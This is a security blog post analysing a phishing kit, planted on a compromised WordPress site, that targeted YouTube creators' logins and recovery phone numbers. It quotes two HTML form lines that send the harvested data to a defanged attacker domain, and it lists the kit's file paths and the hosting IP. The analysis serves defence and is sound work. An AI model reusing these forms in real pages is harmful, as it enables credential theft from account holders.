• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
YouTube Phishing Malware Campaign

YouTube Account Recovery Phishing

May 12, 2020Luke Leal

16
SHARES
FacebookTwitterSubscribe

Phishing attacks against targeted channels have been successful in the past, as explained last year on ZDNet. Recently, our Remediation team found an interesting phishing page following a similar pattern that was targeting YouTube creators.

Phishing Behavior

The phishing campaign, which was initially discovered on a compromised WordPress website, is made up of two pages responsible for harvesting and sending along the victim’s stolen username, password, and recovery phone number.

YouTube Phishing Campaign Workflow

Simply knowing the account recovery phone number will not allow the attacker to bypass 2FA for accounts that have it enabled. But it will be helpful to know the current registered phone number in case it’s needed during a takeover through the account recovery process.

Data Exfiltration & Redirect Chain

Unlike many phishing kits we encounter which use PHP to store or exfiltrate phished data, this particular campaign does not use any PHP files in the uploaded kit. Instead, the phishing page’s HTML sends the form data to a PHP file hosted at a third-party URL through two separate POST requests.

The first POST request is sent after the victim submits their account’s email address and password on the phishing page.

<form onsubmit="return validateForm();" name="loginForm" method="post" action="hxxps://www.shared8f8x9a[.]com/y1.php">

A similar line of HTML is used on the second page that requests the victim’s account recovery phone number. On submission, this sends the data to a PHP file on the third party URL.

<form onsubmit="return validateForm();" name="loginForm" method="post" action="hxxps://www.shared8f8x9a[.]com/y2.php">

A final redirect is provided by the response to the recovery phone number POST request, which redirects the victim from the phishing page to YouTube’s Creator Awards’ official page.

Request URL for Youtube Phishing

The phishing kit was found within the following files on the compromised WordPress environment:

./wp-includes/css/dist/components/index.html
./wp-includes/css/dist/components/VerifyYourRecoveryPhone/index.html
./wp-includes/css/dist/components/data/main.js
./wp-includes/css/dist/components/data/main.css

It looks like the malicious domain shared8f8x9a[.]com was registered with Namecheap on May 30, 2019 and — based on the IP address (198.54.115.43) it resolves to — is hosted there as well.

At the time of discovery, the domain had not been blacklisted by any major vendor according to these VirusTotal results.

virustotal results for malware campaign

Conclusion & Mitigation Steps

While we don’t know for sure that this phishing lure was used to attract victims to the phishing pages, it would appear that the attackers were targeting YouTube creators based on the final URL redirecting to YouTube’s Creator Awards.

One could imagine a phishing email informing the victim that they received a Creator Award and to sign into their account to view it (except they do so through the phishing page and not the legit service).

Phishing is typically hard to detect because malicious pages are often created deep inside the directory structure. Unless you know the exact URL of the phishing page, it can be pretty hard to tell if your site has been hacked,

Webmasters can use Google Search Console to receive notifications about phishing and other security problems. File integrity monitoring solutions can also help to identify indicators of compromise.

If your website is exhibiting malicious behavior or you think it might have been compromised with this infection, you can follow the detailed instructions in our hacked WordPress Guide to remove the malware or leverage our cleanup services.

16
SHARES
FacebookTwitterSubscribe

Categories: Security Education, Website Malware Infections, Website SecurityTags: Black Hat Tactics, Hacked Websites, Phishing, Redirects

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

2019 Threat Report

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.